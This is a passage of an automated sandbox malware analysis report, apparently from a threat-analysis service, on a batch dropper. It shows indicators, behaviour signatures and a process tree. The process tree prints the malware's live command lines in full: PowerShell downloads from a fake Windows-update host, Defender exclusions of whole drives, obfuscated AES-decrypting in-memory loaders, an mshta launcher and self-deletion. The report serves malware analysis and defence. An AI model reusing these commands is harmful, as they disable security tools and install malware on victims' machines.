0ad689faa00e511421c71ea560cb430a29c4de5572c8be8b8f1df2974bce02b5

Analysis

max time kernel
127s
max time network
130s
platform
windows10-1703_x64
resource
win10-20231020-en
resource tags

arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system
submitted
11/11/2023, 09:22

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Mass Dmer.bat
Size

1KB
MD5

5ac8897ff732070a7ffe9147c599e01e
SHA1

39db3eccc2d8a1e06038282c49c6af405cf44431
SHA256

0ad689faa00e511421c71ea560cb430a29c4de5572c8be8b8f1df2974bce02b5
SHA512

7951c6f9d2fdf3450fdc76befca65587aa2c13fec385afa272f2359d8778379e9cebf9fdcc06ce636b162f1505d15ae15aa165deb1bac748eaba275891fb1c0b

Score

10^/10

pyinstaller

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rooptimizer.windowsupdates.repl.co/Uni.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rooptimizer.windowsupdates.repl.co/function.exe

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 928 created 588	928	Uni.bat.exe	3
PID 928 created 588	928	Uni.bat.exe	3

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	4620	powershell.exe
5	3976	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000\Control Panel\International\Geo\Nation	$sxr-mshta.exe

Executes dropped EXE 6 IoCs

pid	Process
1544	function.exe
928	Uni.bat.exe
4568	function.exe
1744	$sxr-mshta.exe
4644	$sxr-cmd.exe
3676	$sxr-powershell.exe

Loads dropped DLL 19 IoCs

pid	Process
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe
4568	function.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 928 set thread context of 4120	928	Uni.bat.exe	89
PID 928 set thread context of 5060	928	Uni.bat.exe	90
PID 928 set thread context of 3668	928	Uni.bat.exe	97
PID 928 set thread context of 4848	928	Uni.bat.exe	98

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-mshta.exe	Uni.bat.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	Uni.bat.exe
File created	C:\Windows\$sxr-cmd.exe	Uni.bat.exe
File opened for modification	C:\Windows\$sxr-cmd.exe	Uni.bat.exe
File created	C:\Windows\$sxr-powershell.exe	Uni.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	Uni.bat.exe

Detects Pyinstaller 3 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000700000001abf2-114.dat	pyinstaller
behavioral1/files/0x000700000001abf2-117.dat	pyinstaller
behavioral1/files/0x000700000001abf2-148.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4884	timeout.exe
1228	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1708	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	$sxr-mshta.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1928	PING.EXE

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
220	powershell.exe
220	powershell.exe
220	powershell.exe
4620	powershell.exe
4620	powershell.exe
4620	powershell.exe
3976	powershell.exe
3976	powershell.exe
3976	powershell.exe
928	Uni.bat.exe
928	Uni.bat.exe
928	Uni.bat.exe
928	Uni.bat.exe
4120	dllhost.exe
4120	dllhost.exe
4120	dllhost.exe
4120	dllhost.exe
5060	dllhost.exe
5060	dllhost.exe
5060	dllhost.exe
5060	dllhost.exe
928	Uni.bat.exe
928	Uni.bat.exe
3676	$sxr-powershell.exe
3676	$sxr-powershell.exe
3676	$sxr-powershell.exe
3676	$sxr-powershell.exe
928	Uni.bat.exe
3668	dllhost.exe
3668	dllhost.exe
3668	dllhost.exe
3668	dllhost.exe
4848	dllhost.exe
4848	dllhost.exe
4848	dllhost.exe
4848	dllhost.exe
928	Uni.bat.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

description	pid	Process
Token: SeDebugPrivilege	220	powershell.exe
Token: SeIncreaseQuotaPrivilege	220	powershell.exe
Token: SeSecurityPrivilege	220	powershell.exe
Token: SeTakeOwnershipPrivilege	220	powershell.exe
Token: SeLoadDriverPrivilege	220	powershell.exe
Token: SeSystemProfilePrivilege	220	powershell.exe
Token: SeSystemtimePrivilege	220	powershell.exe
Token: SeProfSingleProcessPrivilege	220	powershell.exe
Token: SeIncBasePriorityPrivilege	220	powershell.exe
Token: SeCreatePagefilePrivilege	220	powershell.exe
Token: SeBackupPrivilege	220	powershell.exe
Token: SeRestorePrivilege	220	powershell.exe
Token: SeShutdownPrivilege	220	powershell.exe
Token: SeDebugPrivilege	220	powershell.exe
Token: SeSystemEnvironmentPrivilege	220	powershell.exe
Token: SeRemoteShutdownPrivilege	220	powershell.exe
Token: SeUndockPrivilege	220	powershell.exe
Token: SeManageVolumePrivilege	220	powershell.exe
Token: 33	220	powershell.exe
Token: 34	220	powershell.exe
Token: 35	220	powershell.exe
Token: 36	220	powershell.exe
Token: SeIncreaseQuotaPrivilege	220	powershell.exe
Token: SeSecurityPrivilege	220	powershell.exe
Token: SeTakeOwnershipPrivilege	220	powershell.exe
Token: SeLoadDriverPrivilege	220	powershell.exe
Token: SeSystemProfilePrivilege	220	powershell.exe
Token: SeSystemtimePrivilege	220	powershell.exe
Token: SeProfSingleProcessPrivilege	220	powershell.exe
Token: SeIncBasePriorityPrivilege	220	powershell.exe
Token: SeCreatePagefilePrivilege	220	powershell.exe
Token: SeBackupPrivilege	220	powershell.exe
Token: SeRestorePrivilege	220	powershell.exe
Token: SeShutdownPrivilege	220	powershell.exe
Token: SeDebugPrivilege	220	powershell.exe
Token: SeSystemEnvironmentPrivilege	220	powershell.exe
Token: SeRemoteShutdownPrivilege	220	powershell.exe
Token: SeUndockPrivilege	220	powershell.exe
Token: SeManageVolumePrivilege	220	powershell.exe
Token: 33	220	powershell.exe
Token: 34	220	powershell.exe
Token: 35	220	powershell.exe
Token: 36	220	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	928	Uni.bat.exe
Token: SeDebugPrivilege	928	Uni.bat.exe
Token: SeDebugPrivilege	4120	dllhost.exe
Token: SeDebugPrivilege	5060	dllhost.exe
Token: SeDebugPrivilege	3676	$sxr-powershell.exe
Token: SeDebugPrivilege	928	Uni.bat.exe
Token: SeDebugPrivilege	3668	dllhost.exe
Token: SeDebugPrivilege	4848	dllhost.exe
Token: SeDebugPrivilege	1708	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4392 wrote to memory of 308	4392	cmd.exe	72
PID 4392 wrote to memory of 308	4392	cmd.exe	72
PID 4392 wrote to memory of 220	4392	cmd.exe	73
PID 4392 wrote to memory of 220	4392	cmd.exe	73
PID 4392 wrote to memory of 4620	4392	cmd.exe	75
PID 4392 wrote to memory of 4620	4392	cmd.exe	75
PID 4392 wrote to memory of 4508	4392	cmd.exe	76
PID 4392 wrote to memory of 4508	4392	cmd.exe	76
PID 4392 wrote to memory of 4884	4392	cmd.exe	78
PID 4392 wrote to memory of 4884	4392	cmd.exe	78
PID 4392 wrote to memory of 3976	4392	cmd.exe	79
PID 4392 wrote to memory of 3976	4392	cmd.exe	79
PID 4392 wrote to memory of 1544	4392	cmd.exe	80
PID 4392 wrote to memory of 1544	4392	cmd.exe	80
PID 4392 wrote to memory of 1228	4392	cmd.exe	82
PID 4392 wrote to memory of 1228	4392	cmd.exe	82
PID 4508 wrote to memory of 928	4508	cmd.exe	83
PID 4508 wrote to memory of 928	4508	cmd.exe	83
PID 1544 wrote to memory of 4568	1544	function.exe	84
PID 1544 wrote to memory of 4568	1544	function.exe	84
PID 4568 wrote to memory of 4428	4568	function.exe	85
PID 4568 wrote to memory of 4428	4568	function.exe	85
PID 4428 wrote to memory of 2352	4428	cmd.exe	86
PID 4428 wrote to memory of 2352	4428	cmd.exe	86
PID 4568 wrote to memory of 4652	4568	function.exe	87
PID 4568 wrote to memory of 4652	4568	function.exe	87
PID 928 wrote to memory of 4120	928	Uni.bat.exe	89
PID 928 wrote to memory of 4120	928	Uni.bat.exe	89
PID 928 wrote to memory of 4120	928	Uni.bat.exe	89
PID 928 wrote to memory of 4120	928	Uni.bat.exe	89
PID 928 wrote to memory of 4120	928	Uni.bat.exe	89
PID 928 wrote to memory of 4120	928	Uni.bat.exe	89
PID 928 wrote to memory of 4120	928	Uni.bat.exe	89
PID 928 wrote to memory of 5060	928	Uni.bat.exe	90
PID 928 wrote to memory of 5060	928	Uni.bat.exe	90
PID 928 wrote to memory of 5060	928	Uni.bat.exe	90
PID 928 wrote to memory of 5060	928	Uni.bat.exe	90
PID 928 wrote to memory of 5060	928	Uni.bat.exe	90
PID 928 wrote to memory of 5060	928	Uni.bat.exe	90
PID 928 wrote to memory of 5060	928	Uni.bat.exe	90
PID 928 wrote to memory of 5060	928	Uni.bat.exe	90
PID 928 wrote to memory of 5060	928	Uni.bat.exe	90
PID 1744 wrote to memory of 4644	1744	$sxr-mshta.exe	92
PID 1744 wrote to memory of 4644	1744	$sxr-mshta.exe	92
PID 4644 wrote to memory of 3676	4644	$sxr-cmd.exe	94
PID 4644 wrote to memory of 3676	4644	$sxr-cmd.exe	94
PID 928 wrote to memory of 3668	928	Uni.bat.exe	97
PID 928 wrote to memory of 3668	928	Uni.bat.exe	97
PID 928 wrote to memory of 3668	928	Uni.bat.exe	97
PID 928 wrote to memory of 3668	928	Uni.bat.exe	97
PID 928 wrote to memory of 3668	928	Uni.bat.exe	97
PID 928 wrote to memory of 3668	928	Uni.bat.exe	97
PID 928 wrote to memory of 3668	928	Uni.bat.exe	97
PID 928 wrote to memory of 4848	928	Uni.bat.exe	98
PID 928 wrote to memory of 4848	928	Uni.bat.exe	98
PID 928 wrote to memory of 4848	928	Uni.bat.exe	98
PID 928 wrote to memory of 4848	928	Uni.bat.exe	98
PID 928 wrote to memory of 4848	928	Uni.bat.exe	98
PID 928 wrote to memory of 4848	928	Uni.bat.exe	98
PID 928 wrote to memory of 4848	928	Uni.bat.exe	98
PID 928 wrote to memory of 4848	928	Uni.bat.exe	98
PID 928 wrote to memory of 4848	928	Uni.bat.exe	98
PID 928 wrote to memory of 3960	928	Uni.bat.exe	99
PID 928 wrote to memory of 3960	928	Uni.bat.exe	99

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3728	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:588
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3d3047f5-455a-44eb-afb0-f950cb61d360}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4120
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{844bb8ae-7678-43e3-9c55-27054800fb92}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Mass Dmer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4392
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\' ; Add-MpPreference -ExclusionPath 'D:\'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "$url = 'https://rooptimizer.windowsupdates.repl.co/Uni.bat'; $output = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat'; $wc = New-Object System.Net.WebClient; $wc.DownloadFile($url, $output)"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4508
- - C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
    "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function klhOv($iZidJ){ $hqThJ=[System.Security.Cryptography.Aes]::Create(); $hqThJ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $hqThJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $hqThJ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwAynUOx6zV/izAQyDz8dJLC3G2+/4H4TUvflViBlb8='); $hqThJ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbDElHd14ZYTlBaiGbgU+Q=='); $ZrhvC=$hqThJ.CreateDecryptor(); $return_var=$ZrhvC.TransformFinalBlock($iZidJ, 0, $iZidJ.Length); $ZrhvC.Dispose(); $hqThJ.Dispose(); $return_var;}function fbLqj($iZidJ){ $pMubu=New-Object System.IO.MemoryStream(,$iZidJ); $VKtGk=New-Object System.IO.MemoryStream; $PcphQ=New-Object System.IO.Compression.GZipStream($pMubu, [IO.Compression.CompressionMode]::Decompress); $PcphQ.CopyTo($VKtGk); $PcphQ.Dispose(); $pMubu.Dispose(); $VKtGk.Dispose(); $VKtGk.ToArray();}function Wvdmo($iZidJ,$pmFiO){ $zdWej=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$iZidJ); $nNPtW=$zdWej.EntryPoint; $nNPtW.Invoke($null, $pmFiO);}$zTqMJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pdFoX in $zTqMJ) { if ($pdFoX.StartsWith('SEROXEN')) { $GtaLe=$pdFoX.Substring(7); break; }}$CXaem=[string[]]$GtaLe.Split('\');$WBqWV=fbLqj (klhOv ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CXaem[0])));$Dwgtn=fbLqj (klhOv ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CXaem[1])));Wvdmo $Dwgtn (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Wvdmo $WBqWV (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:928
  - - C:\Windows\SysWOW64\dllhost.exe
      C:\Windows\SysWOW64\dllhost.exe /Processid:{88470be7-88cf-4d40-8fc6-b3b1afe06e8d}
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5060
  - - C:\Windows\SysWOW64\dllhost.exe
      C:\Windows\SysWOW64\dllhost.exe /Processid:{6f279f0f-6324-48f3-81df-f5e91c64cc6a}
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4848
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & exit
      4⤵
      PID:3960
    - - C:\Windows\system32\PING.EXE
        
        PING localhost -n 8
        5⤵
        Runs ping.exe
        
        PID:1928
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1708
    - - C:\Windows\system32\attrib.exe
        
        ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
        5⤵
        Views/modifies file attributes
        
        PID:3728
- C:\Windows\system32\timeout.exe
  timeout /t 5 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4884
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "$url = 'https://rooptimizer.windowsupdates.repl.co/function.exe'; $output = 'C:\Users\Admin\AppData\Local\Temp\function.exe'; $wc = New-Object System.Net.WebClient; $wc.DownloadFile($url, $output)"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3976
- C:\Users\Admin\AppData\Local\Temp\function.exe
  "C:\Users\Admin\AppData\Local\Temp\function.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1544
- - C:\Users\Admin\AppData\Local\Temp\function.exe
    "C:\Users\Admin\AppData\Local\Temp\function.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c mode con cols=77 lines=27
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4428
    - - C:\Windows\system32\mode.com
        
        mode con cols=77 lines=27
        5⤵
        
        PID:2352
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c
      4⤵
      PID:4652
- C:\Windows\system32\timeout.exe
  timeout /t 5 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1228

C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jykjPkbfAdbUFaElPmpS4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1744
- C:\Windows\$sxr-cmd.exe
  "C:\Windows\$sxr-cmd.exe" /c %$sxr-jykjPkbfAdbUFaElPmpS4312:&#<?=%
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4644
- - C:\Windows\$sxr-powershell.exe
    C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function gzuhE($kVSMb){ $XZubm=[System.Security.Cryptography.Aes]::Create(); $XZubm.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XZubm.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XZubm.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iWlD8NTjqNdH5wvqO5O0eQ6cRqrC1kFk77pFbq9uwqQ='); $XZubm.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('viPo/hyxNOJwGmB8Vrs09A=='); $NRPkO=$XZubm.('rotpyrceDetaerC'[-1..-15] -join '')(); $fwRxs=$NRPkO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kVSMb, 0, $kVSMb.Length); $NRPkO.Dispose(); $XZubm.Dispose(); $fwRxs;}function qgdeo($kVSMb){ $tRYJN=New-Object System.IO.MemoryStream(,$kVSMb); $iCWJm=New-Object System.IO.MemoryStream; $YsMyw=New-Object System.IO.Compression.GZipStream($tRYJN, [IO.Compression.CompressionMode]::Decompress); $YsMyw.CopyTo($iCWJm); $YsMyw.Dispose(); $tRYJN.Dispose(); $iCWJm.Dispose(); $iCWJm.ToArray();}function EHotd($kVSMb,$mkfia){ $odOGZ=[System.Reflection.Assembly]::Load([byte[]]$kVSMb); $glGvg=$odOGZ.EntryPoint; $glGvg.Invoke($null, $mkfia);}$XZubm1 = New-Object System.Security.Cryptography.AesManaged;$XZubm1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$XZubm1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$XZubm1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iWlD8NTjqNdH5wvqO5O0eQ6cRqrC1kFk77pFbq9uwqQ=');$XZubm1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('viPo/hyxNOJwGmB8Vrs09A==');$oREvz = $XZubm1.('rotpyrceDetaerC'[-1..-15] -join '')();$LueLC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NyItj7lHmYaJwQN5OjFNfQ==');$LueLC = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LueLC, 0, $LueLC.Length);$LueLC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LueLC);$YVydT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('q0LPxix8CPrNLRPnkpczbk/l6936Yuo95NIB2zUofts=');$YVydT = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YVydT, 0, $YVydT.Length);$YVydT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YVydT);$gJxVl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V/2H7arZwEwCl0Pjrrx0iA==');$gJxVl = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gJxVl, 0, $gJxVl.Length);$gJxVl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gJxVl);$FXzPN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+fipLuEE8ql8tvn1ryIXLrDE5vjtrjVJlp6NiseeQd6s+pc5UEzofNTsh7ajlOY+bz26UZ9sSahUjyeH12teh1/ke3Q4sxv88da8Gy7RJmmv6CB9uk4Yh4xUS4dHL1VVvWkvJ4xS0wHWv4nb8FmL36u0wape+/BZHEQI0VXz3IFVYCC8StnodPXfHEwtKT4iCE9MqWyLDBPQQwG++94VUEPrF5x5rjp5pDzNsOGy9o4wadFtDCXCrx6T60FH/oC0R1ug+mLXSg7es8+GzIBNvT3qs8XBedBPfOWS+s+q60J0o5yrR7mmhbAB4dYpXMxjRioggcm9Ls+52d1ezbCadil6LCx+Z0yKsgbb+V/l8brG6ieyVcOWIR7P8S2hEoNgcr85kXr3BFCaw0Y21YqdfdPeiybzChA5j2tv6y9TFo=');$FXzPN = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FXzPN, 0, $FXzPN.Length);$FXzPN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FXzPN);$lGIfr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mezh4IaNB0lStbEJPmY9pA==');$lGIfr = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lGIfr, 0, $lGIfr.Length);$lGIfr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lGIfr);$fbVdc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4eZAZ/rY5KC/TNtNEec/9A==');$fbVdc = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fbVdc, 0, $fbVdc.Length);$fbVdc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fbVdc);$GjlWs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('20IFbbMu9Y7m7o6SmR2Rjg==');$GjlWs = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GjlWs, 0, $GjlWs.Length);$GjlWs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GjlWs);$KrgUt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('o3BJPnL8KqVD9hlE7PZ3vA==');$KrgUt = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KrgUt, 0, $KrgUt.Length);$KrgUt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KrgUt);$oxPTV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PZtVHM+6YKBSrCwllZWW1g==');$oxPTV = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oxPTV, 0, $oxPTV.Length);$oxPTV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oxPTV);$LueLC0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P46Dx4tnbUGr4lBK9Eke4A==');$LueLC0 = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LueLC0, 0, $LueLC0.Length);$LueLC0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LueLC0);$LueLC1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YGVHjC51dckWKOHIU5wf4w==');$LueLC1 = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LueLC1, 0, $LueLC1.Length);$LueLC1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LueLC1);$LueLC2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iPk8iehBJi2QDj/tuaXF8w==');$LueLC2 = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LueLC2, 0, $LueLC2.Length);$LueLC2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LueLC2);$LueLC3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('awURO0DQe1voGe6Gw+3KVg==');$LueLC3 = $oREvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LueLC3, 0, $LueLC3.Length);$LueLC3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LueLC3);$oREvz.Dispose();$XZubm1.Dispose();if (@(get-process -ea silentlycontinue $LueLC3).count -gt 1) {exit};$fZCrx = [Microsoft.Win32.Registry]::$KrgUt.$GjlWs($LueLC).$fbVdc($YVydT);$NXRZr=[string[]]$fZCrx.Split('\');$cPWiX=qgdeo(gzuhE([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NXRZr[1])));EHotd $cPWiX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$mXxdx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NXRZr[0]);$XZubm = New-Object System.Security.Cryptography.AesManaged;$XZubm.Mode = [System.Security.Cryptography.CipherMode]::CBC;$XZubm.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$XZubm.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iWlD8NTjqNdH5wvqO5O0eQ6cRqrC1kFk77pFbq9uwqQ=');$XZubm.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('viPo/hyxNOJwGmB8Vrs09A==');$NRPkO = $XZubm.('rotpyrceDetaerC'[-1..-15] -join '')();$mXxdx = $NRPkO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mXxdx, 0, $mXxdx.Length);$NRPkO.Dispose();$XZubm.Dispose();$tRYJN = New-Object System.IO.MemoryStream(, $mXxdx);$iCWJm = New-Object System.IO.MemoryStream;$YsMyw = New-Object System.IO.Compression.GZipStream($tRYJN, 